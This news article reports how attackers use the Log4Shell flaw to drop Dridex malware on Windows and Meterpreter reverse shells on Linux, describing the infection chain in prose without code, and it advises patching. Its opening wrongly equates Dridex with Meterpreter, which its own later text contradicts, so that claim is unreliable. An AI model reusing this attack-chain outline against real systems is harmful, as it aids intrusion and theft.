Threat actors are now using the Log4Shell vulnerability in Apache Log4j to infect susceptible devices with the infamous Dridex banking malware, also known as Meterpreter. The Dridex malware is a banking trojan designed to steal victims’ online banking credentials. But the malware has developed over time to become a loader that downloads multiple modules and executes various harmful behaviors, such as installing other payloads, spreading to other devices, collecting screenshots, etc.
Infections with Dridex have also been connected to ransomware operations by organizations related to the Evil Corp hacker gang. BitPaymer, DoppelPaymer, and perhaps other limited-use ransomware versions are among the ransomware attacks.
According to cybersecurity firm Cryptolaemus, the Log4j flaw is currently used to infect Windows devices with the Dridex Trojan and Linux devices with Meterpreter. Cryptolaemus member Joseph Roosen revealed that threat actors employ the Log4j RMI (Remote Method Invocation) exploit variant to compel susceptible devices to load and execute a Java class from an attacker-controlled remote server.
When the Java class is run, it attempts to download and launch an HTA file from various URLs, installing the Dridex trojan. If the Windows instructions aren’t working, it’ll presume the device is running Linux/Unix and download and run a Python script to install Meterpreter. The threat actors will get a remote shell if they run Meterpreter on a Linux computer, which they may exploit to deliver other payloads or run commands. The Dridex threat actors are infamous for employing racial and religious insults in their file names and URLs.
On Windows, the Java class would download and execute an HTA file, resulting in creating a VBS file in the C:\ProgramData folder. This VBS program, which has already been detected in earlier Dridex email campaigns, serves as the primary downloader for Dridex. When run, the VBS code checks several environment variables to see if the user is a member of a Windows domain. If the user is a domain member, the VBS file would download and run the Dridex DLL using Rundll32.exe.
As previously stated, if the initial Java class exploit cannot run the Windows commands, it will presume the device is a Unix/Linux device and download an ‘m.py’ python script instead. The preceding script includes a base64 encoded script that will be run to install Meterpreter, a pentesting tool that gives threat actors a reverse shell. Threat actors can use Meterpreter to connect to the infected Linux server and remotely execute commands to distribute malware over the network, steal data, or encrypt data.
It’s no surprise that, with Log4j being used by threat actors to install a wide spectrum of malware, the more active malware operations would turn their attention to the vulnerability. Other malware activities are likely to use the flaw to infiltrate servers and inside business networks. As a result, it’s strongly recommended that all businesses search for vulnerable Log4j applications and upgrade them to the most recent versions.
This includes upgrading Log4j to the most recent version, 2.17, issued on Saturday to address a new denial of service flaw. There are many Log4j scanners available for finding susceptible apps, including a new local scanner from Profero security.